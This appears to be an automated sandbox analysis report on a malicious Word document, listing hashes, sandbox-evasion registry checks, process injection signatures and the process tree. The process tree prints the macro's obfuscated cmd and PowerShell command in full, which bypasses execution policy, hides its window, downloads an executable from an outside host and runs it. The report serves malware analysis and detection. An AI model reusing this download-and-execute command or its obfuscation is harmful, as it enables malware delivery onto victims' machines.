Analysis
-
max time kernel
182s -
max time network
191s -
platform
windows10-2004_x64 -
resource
win10v2004-20220331-en -
submitted
08/04/2022, 01:41
Static task
static1
Behavioral task
behavioral1
Sample
0ae3f024befcb994e66993d755a5195b.doc
Resource
win7-20220331-en
0 signatures
0 seconds
General
-
Target
0ae3f024befcb994e66993d755a5195b.doc
-
Size
51KB
-
MD5
0ae3f024befcb994e66993d755a5195b
-
SHA1
51a2f146b3e574b6bdafceb1e5dffe10b4b5e5b8
-
SHA256
f92087059144bdfd22bc76d34d247564fe05f54be5c8b3c95624d792645b33f1
-
SHA512
b21e0ec0ded83a33c5c2063e7e377957dad47c14afb792541a2414b9e3e610a48a9a2ece0d3816e8cd83a42969500249d5ec5d89d68e58d6f90d55678db85a86
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://www.nnapoakea.top/read.php?f=0.dat
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2864 4136 CMD.Exe 81 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4136 WINWORD.EXE 4136 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1236 powershell.exe 1236 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1236 powershell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 4136 WINWORD.EXE 4136 WINWORD.EXE 4136 WINWORD.EXE 4136 WINWORD.EXE 4136 WINWORD.EXE 4136 WINWORD.EXE 4136 WINWORD.EXE 4136 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4136 wrote to memory of 2864 4136 WINWORD.EXE 86 PID 4136 wrote to memory of 2864 4136 WINWORD.EXE 86 PID 2864 wrote to memory of 1236 2864 CMD.Exe 88 PID 2864 wrote to memory of 1236 2864 CMD.Exe 88
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0ae3f024befcb994e66993d755a5195b.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\SYSTEM32\CMD.ExeCMD.Exe /C "POwERs^h^E^L^l.e^xe -EXeC^U^T^I^onpolicY^ ^B^YPa^ss^ ^-nO^PR^OfIlE ^-Wind^ow^StylE Hidd^e^N ^(ne^w-o^bj^ECT sYSTEM.NeT^.We^B^c^L^ie^nt).d^o^W^NlOAdfiLe('http://www.nnapoakea.top/read.php?f=0.dat','%APPdAta%.exe');^St^a^R^T-Pr^oCE^s^s^ '%ApPDaTA%.EXE'"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwERshELl.exe -EXeCUTIonpolicY BYPass -nOPROfIlE -WindowStylE HiddeN (new-objECT sYSTEM.NeT.WeBcLient).doWNlOAdfiLe('http://www.nnapoakea.top/read.php?f=0.dat','C:\Users\Admin\AppData\Roaming.exe');StaRT-ProCEss 'C:\Users\Admin\AppData\Roaming.EXE'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
-